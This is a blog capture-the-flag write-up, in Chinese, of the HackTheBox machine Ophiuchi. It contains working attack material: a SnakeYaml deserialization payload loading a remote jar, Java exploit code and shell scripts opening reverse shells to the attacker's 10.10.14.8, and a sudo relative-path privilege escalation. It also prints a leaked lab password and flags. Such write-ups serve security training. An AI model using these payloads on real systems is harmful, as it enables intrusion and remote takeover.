Ophiuchi-htb-writeup

0x00 靶场技能介绍

章节技能:YAML 反序列化、SnakeYaml 反序列化漏洞 、tomcat-users.xml 密码泄露、sudo提权、环境变量提权

参考链接:https://www.jgeek.cn/article/97.html

参考链接:https://marmeus.com/post/Ophiuchi

参考链接:https://www.r3pek.org/posts/htb-ophiuchi-box/

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.227

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.227 tcp
[sudo] kali 的密码:
开始对 10.10.10.227 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.227" -oG "10.10.10.227"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 16:00 CST
Nmap scan report for 10.10.10.227
Host is up (0.31s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -p"22,8080," "10.10.10.227"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 16:00 CST
Nmap scan report for 10.10.10.227
Host is up (0.31s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
|   256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_  256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.38
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.96 seconds

3、查看下8080端口服务情况

http://10.10.10.227:8080/

4、通过扫描目录等情况,感觉入口点应该都不是,那估计还是首页的这个功能

5、YAML 反序列化,开始怀疑这个题目是考这个,根据网站使用的Java框架,估计是 java yaml的反序列化,经过尝试一些网上公开的yaml反序列化的poc和常规的yaml文本,都是提示安全策略

6、但是使用 单引号进行输入,发现了报错信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
while scanning a quoted scalar
 in 'string', line 1, column 1:
    '
    ^
found unexpected end of stream
 in 'string', line 1, column 2:
    '
     ^

	org.yaml.snakeyaml.scanner.ScannerImpl.scanFlowScalarSpaces(ScannerImpl.java:1916)
	org.yaml.snakeyaml.scanner.ScannerImpl.scanFlowScalar(ScannerImpl.java:1831)
	org.yaml.snakeyaml.scanner.ScannerImpl.fetchFlowScalar(ScannerImpl.java:1027)
	org.yaml.snakeyaml.scanner.ScannerImpl.fetchSingle(ScannerImpl.java:1002)
	org.yaml.snakeyaml.scanner.ScannerImpl.fetchMoreTokens(ScannerImpl.java:390)
	org.yaml.snakeyaml.scanner.ScannerImpl.checkToken(ScannerImpl.java:227)
	org.yaml.snakeyaml.parser.ParserImpl$ParseImplicitDocumentStart.produce(ParserImpl.java:195)
	org.yaml.snakeyaml.parser.ParserImpl.peekEvent(ParserImpl.java:158)
	org.yaml.snakeyaml.parser.ParserImpl.checkEvent(ParserImpl.java:148)
	org.yaml.snakeyaml.composer.Composer.getSingleNode(Composer.java:118)
	org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:150)
	org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:490)
	org.yaml.snakeyaml.Yaml.load(Yaml.java:416)
	Servlet.doPost(Servlet.java:15)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:652)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:733)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)

7、由于卡了很久,就直接参考演练报告了

SnakeYaml 反序列化漏洞 - https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/

漏洞的产生原因是由于解析了不受信任的 YAML 数据(!!做为特殊功能出现,该语法允许在解析 YAML 数据时调用任何 Java 类的构造函数,即 (!!<java 类构造函数>)),从而引起的任意代码执行。

8、这里提交poc进行验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.8/"]
  ]]
]

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 80 
listening on [any] 80 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.227] 41856
HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1
User-Agent: Java/11.0.8
Host: 10.10.14.8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

9、发现获取到一些信息的验证请求,验证后漏洞是存在的,目标服务器请求了我本地起的 Web 服务。并且我注意到它会自动加载 /META-INF/services/javax.script.ScriptEngineFactory 进行序列化。

10、顺着这个思路找个漏洞利用文章,构造对目标服务器的 RCE 链:https://pulsesecurity.co.nz/advisories/Insecure-YAML-Deserialisation

11、以下的操作步骤是一个固定的操作步骤,没法去省略的(2个方法都是对的,但是不知道为啥,是环境的问题,还是版本的问题,还没有弄清楚)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
https://github.com/artsploit/yaml-payload

┌──(kali㉿kali)-[~/桌面]
└─$ git clone https://github.com/artsploit/yaml-payload.git  

┌──(kali㉿kali)-[~/桌面]
└─$ cd yaml-payload-master 
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ ls
README.md  src
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ cd src                
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src]
└─$ ls
artsploit  META-INF
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src]
└─$ cd artsploit 
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src/artsploit]
└─$ ls
AwesomeScriptEngineFactory.java


随后修改 AwesomeScriptEngineFactory.java 文件内容:

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

需要修改上面两行.exec()里的内容,这里演练报告分别提供了2个方式进行处置


方法1:

创建1个shell.sh文件,并写入以下内容

#!/bin/bash
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.8 443 > /tmp/f

修改里面内容为这个

Runtime.getRuntime().exec("wget 10.10.14.8:80/shell.sh -O /tmp/shell.sh");
Runtime.getRuntime().exec("bash /tmp/shell.sh");


方法2:


直接修改内容为以下内容

增加2个三方库,再把漏洞利用过程的代码修改下

import java.util.Base64;
import java.util.concurrent.TimeUnit;


String cmd = "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"; // <-- your actual command here
String b64Cmd = Base64.getEncoder().encodeToString(cmd.getBytes());
cmd = "bash -c {echo,"+b64Cmd+"}|{base64,-d}|{bash,-i}"; // *nix only
Runtime.getRuntime().exec(cmd).waitFor(30, TimeUnit.SECONDS); //increase this probably


一会两个都尝试下看看


修改完成后,需要进行编译,这里先使用方法2的

┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src/artsploit]
└─$ vim AwesomeScriptEngineFactory.java 


javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .


┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src/artsploit]
└─$ cd ../../   
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ pwd
/home/kali/桌面/yaml-payload-master


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
src/artsploit/AwesomeScriptEngineFactory.java:21: 错误: 未报告的异常错误InterruptedException; 必须对其进行捕获或声明以便抛出
                        .waitFor(30, TimeUnit.SECONDS); //increase this probably
                                ^
1 个错误


经过人工智能回答,还是得补充下吧,以下是完整的修改内容



import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
import java.util.Base64;
import java.util.concurrent.TimeUnit;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() throws InterruptedException {
        try {
            // Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            // Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
            String cmd = "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"; // <-- your actual command here
            String b64Cmd = Base64.getEncoder().encodeToString(cmd.getBytes());
            cmd = "bash -c {echo,"+b64Cmd+"}|{base64,-d}|{bash,-i}"; // *nix only
            Runtime.getRuntime()
            		.exec(cmd)
            		.waitFor(30, TimeUnit.SECONDS); //increase this probably
        } catch (IOException e) {
            e.printStackTrace();
        }
    }


其余部分没有变动。


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ jar -cvf yaml-payload.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
已添加清单
正在忽略条目META-INF/
正在添加: META-INF/services/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: META-INF/services/javax.script.ScriptEngineFactory(输入 = 36) (输出 = 38)(压缩了 -5%)
正在添加: artsploit/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: artsploit/AwesomeScriptEngineFactory.class(输入 = 2582) (输出 = 1132)(压缩了 56%)
正在添加: artsploit/AwesomeScriptEngineFactory.java(输入 = 2077) (输出 = 658)(压缩了 68%)
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ ls
README.md  src  yaml-payload.jar


然后开始尝试下吧,先在这个目录下挂一个网站服务


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...




!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.8/yaml-payload.jar"]
  ]]
]


然后成功加载了,但是并没有成功获取到反弹shell,那我们就继续用方法1试一下吧


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [16/Jan/2024 16:49:58] "GET /yaml-payload.jar HTTP/1.1" 200 -
10.10.10.227 - - [16/Jan/2024 16:49:59] "GET /yaml-payload.jar HTTP/1.1" 200 -



┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ touch shell.sh
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ cat shell.sh
#!/bin/bash
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.8 443 > /tmp/f


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ vim src/artsploit/AwesomeScriptEngineFactory.java 


Runtime.getRuntime().exec("wget 10.10.14.8:80/shell.sh -O /tmp/shell.sh");
Runtime.getRuntime().exec("bash /tmp/shell.sh");


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ jar -cvf yaml-payload.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
已添加清单
正在忽略条目META-INF/
正在添加: META-INF/services/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: META-INF/services/javax.script.ScriptEngineFactory(输入 = 36) (输出 = 38)(压缩了 -5%)
正在添加: artsploit/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: artsploit/AwesomeScriptEngineFactory.class(输入 = 1692) (输出 = 721)(压缩了 57%)
正在添加: artsploit/AwesomeScriptEngineFactory.java(输入 = 1652) (输出 = 451)(压缩了 72%)
                                                                                                       
┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...


!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.8/yaml-payload.jar"]
  ]]
]

中间还缺一部分呢的内容,就是获取到反弹shell后,然后通过查看配置文件,获取到密码信息

String [] cmd = {"bash","-c","bash -i >& /dev/tcp/10.10.14.8/443 0>&1"};
Runtime.getRuntime().exec(cmd);

这里我修改成这个,也是不行,还是报错。。。。。

12、直接参考演练报告,跳过这一个环节

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
中间还缺一部分呢的内容,就是获取到反弹shell后,然后通过查看配置文件,获取到密码信息

String [] cmd = {"bash","-c","bash -i >& /dev/tcp/10.10.14.8/443 0>&1"};
Runtime.getRuntime().exec(cmd);

这里我修改成这个,也是不行,还是报错。。。。。


$ ls -la /home/admin
-r-------- 1 admin admin   33 Aug  9 13:08 user.txt


cat /opt/tomcat/conf/tomcat-users.xml

<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>

13、使用上述密码,登录靶机,获取到第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/桌面]
└─$ ssh admin@10.10.10.227                 
The authenticity of host '10.10.10.227 (10.10.10.227)' can't be established.
ED25519 key fingerprint is SHA256:Ir/99B9NBdGfdwnV1xsklA2aGCcZLFQsIs1kUlEOvSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.227' (ED25519) to the list of known hosts.
admin@10.10.10.227's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 16 Jan 2024 09:14:26 AM UTC

  System load:             0.0
  Usage of /:              20.0% of 27.43GB
  Memory usage:            14%
  Swap usage:              0%
  Processes:               217
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.227
  IPv6 address for ens160: dead:beef::250:56ff:feb9:2a8


176 updates can be installed immediately.
56 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jan 11 08:23:12 2021 from 10.10.14.2
admin@ophiuchi:~$ ls
user.txt
admin@ophiuchi:~$ cat user.txt
7ec46714f412b9baa33cc41d04a01d75
admin@ophiuchi:~$

0x02 系统权限获取

14、通过查看 sudo 发现一个利用信息

1
2
3
4
5
6
7
8
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
admin@ophiuchi:~$

15、查看该 .go 文件信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
admin@ophiuchi:~$ cat /opt/wasm-functions/index.go
package main

import (
        "fmt"
        wasm "github.com/wasmerio/wasmer-go/wasmer"
        "os/exec"
        "log"
)


func main() {
        bytes, _ := wasm.ReadBytes("main.wasm")

        instance, _ := wasm.NewInstance(bytes)
        defer instance.Close()
        init := instance.Exports["info"]
        result,_ := init()
        f := result.String()
        if (f != "1") {
                fmt.Println("Not ready to deploy")
        } else {
                fmt.Println("Ready to deploy")
                out, err := exec.Command("/bin/sh", "deploy.sh").Output()
                if err != nil {
                        log.Fatal(err)
                }
                fmt.Println(string(out))
        }
}
admin@ophiuchi:~$ ls -la /opt/wasm-functions/index.go
-rw-rw-r-- 1 root root 522 Oct 14  2020 /opt/wasm-functions/index.go
admin@ophiuchi:~$

16、这里还是比较难的,感觉考试的时候应该不会出这么难的题

首先注意到代码中加载了 os.exec,而这个库常用于做命令执行,所以在做代码审计的时候要首先找这种高危的函数及库。通过阅读代码,在 12 行的时候加载了一个外部的 main.wasm 文件。

Wasmer 是一个用于在服务器上执行 WebAssembly 的开源运行时。支持基于 WebAssembly 的超轻量级容器,该容器可以在任何地方运行,还可以嵌入其他编程语言

所以,整段代码的运行逻辑是:

以字节形式读取 WebAssembly 模块(main.wasm)
实例化 WebAssembly 模块
从 WebAssembly 实例获取 info 函数
函数内容不存在则输出提示字符串
函数存在则通过 exec 库执行 “/bin/sh” 运行 “deploy.sh”,打印脚本运行结果。
进入对应文件目录,首先查看文件夹内文件权限,main.wasm 与 deploy.sh 均是当前用户无法编辑的。好消息是脚本中并没有写绝对路径,那么我们只需要在执行 sudo 语句的文件夹内创建这两个文件,按照 shell 执行的优先级,会先找当前路径下同名文件。

17、那开始漏洞利用吧

1
2
3
4
5
6
7
8
9
10
11
12
admin@ophiuchi:~$ cd /opt/wasm-functions/
admin@ophiuchi:/opt/wasm-functions$ find . -ls
  1057188      4 drwxr-xr-x   3 root     root         4096 Oct 14  2020 .
  1322036   2460 -rwxr-xr-x   1 root     root      2516736 Oct 14  2020 ./index
  1321998      4 -rw-rw-r--   1 root     root          522 Oct 14  2020 ./index.go
  1057205      4 -rw-r--r--   1 root     root           88 Oct 14  2020 ./deploy.sh
  1322001   1448 -rwxrwxr-x   1 root     root      1479371 Oct 14  2020 ./main.wasm
  1057190      4 drwxr-xr-x   2 root     root         4096 Oct 14  2020 ./backup
  1057210      4 -rw-r--r--   1 root     root          522 Oct 14  2020 ./backup/index.go
  1057206      4 -rw-r--r--   1 root     root           88 Oct 14  2020 ./backup/deploy.sh
  1057211   1448 -rwxr-xr-x   1 root     root      1479371 Oct 14  2020 ./backup/main.wasm
admin@ophiuchi:/opt/wasm-functions$

将 WebAssembly 文本格式转换为 wasm - https://developer.mozilla.org/zh-CN/docs/WebAssembly/Text_format_to_wasm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
admin@ophiuchi:/opt/wasm-functions$ cd backup/
admin@ophiuchi:/opt/wasm-functions/backup$ ls
deploy.sh  index.go  main.wasm

admin@ophiuchi:/opt/wasm-functions/backup$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.8 - - [16/Jan/2024 09:26:18] "GET / HTTP/1.1" 200 -
10.10.14.8 - - [16/Jan/2024 09:26:19] code 404, message File not found
10.10.14.8 - - [16/Jan/2024 09:26:19] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.8 - - [16/Jan/2024 09:26:21] "GET /main.wasm HTTP/1.1" 200 -

http://10.10.10.227:8000/main.wasm

┌──(kali㉿kali)-[~/桌面]
└─$ wasm2wat main.wasm -o main.wat 
                                                                                                       
┌──(kali㉿kali)-[~/桌面]
└─$ vim main.wat 
                                                                                                       
┌──(kali㉿kali)-[~/桌面]
└─$ wat2wasm main.wat -o main2.wasm
                                                                                                       
┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [16/Jan/2024 17:32:40] "GET /main2.wasm HTTP/1.1" 200 -

admin@ophiuchi:/opt/wasm-functions/backup$ cd /tmp
admin@ophiuchi:/tmp$ ls
hsperfdata_tomcat
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-logind.service-ejrfbh
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-resolved.service-CwFJxf
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-timesyncd.service-uwyoTh
vmware-root_671-3988556280
admin@ophiuchi:/tmp$ wget http://10.10.14.8/main2.wasm
--2024-01-16 09:32:40--  http://10.10.14.8/main2.wasm
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 112 [application/wasm]
Saving to: ‘main2.wasm’

main2.wasm                100%[====================================>]     112  --.-KB/s    in 0s      

2024-01-16 09:32:40 (3.75 MB/s) - ‘main2.wasm’ saved [112/112]

admin@ophiuchi:/tmp$ 

admin@ophiuchi:/tmp$ ls
hsperfdata_tomcat
main2.wasm
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-logind.service-ejrfbh
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-resolved.service-CwFJxf
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-timesyncd.service-uwyoTh
vmware-root_671-3988556280
admin@ophiuchi:/tmp$ cp main2.wasm /opt/wasm-functions/backup/main.wasm
cp: cannot create regular file '/opt/wasm-functions/backup/main.wasm': Permission denied
admin@ophiuchi:/tmp$ cp main2.wasm main.wasm
admin@ophiuchi:/tmp$ ls
hsperfdata_tomcat
main2.wasm
main.wasm
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-logind.service-ejrfbh
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-resolved.service-CwFJxf
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-timesyncd.service-uwyoTh
vmware-root_671-3988556280
admin@ophiuchi:/tmp$ touch deploy.sh
admin@ophiuchi:/tmp$ vim deploy.sh 
admin@ophiuchi:/tmp$ cat deploy.sh 
#!/bin/bash

# ToDo
# Create script to automatic deploy our new web at tomcat port 8080
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.8 443 > /tmp/f
admin@ophiuchi:/tmp$ 

admin@ophiuchi:/tmp$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy

18、通过反弹shell,获取到了最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.227] 48754
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.tx
cat: /root/root.tx: No such file or directory
# 
# cat /root/root.txt
04fe40ae052bd5a1c78679b1b506c0a1
#

19、把那些列表里的靶机都打完后,还是付费打官方的pg靶机吧,这些靶机的难度,明显不合理。。。考试不会这么难的。。。做的都像是做高数了。。。

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/315

打靶记
#shooting-range
Ophiuchi-htb-writeup
https://sh1yan.top/2024/01/15/Ophiuchi-htb-writeup/
作者
shiyan
发布于
2024年1月15日
许可协议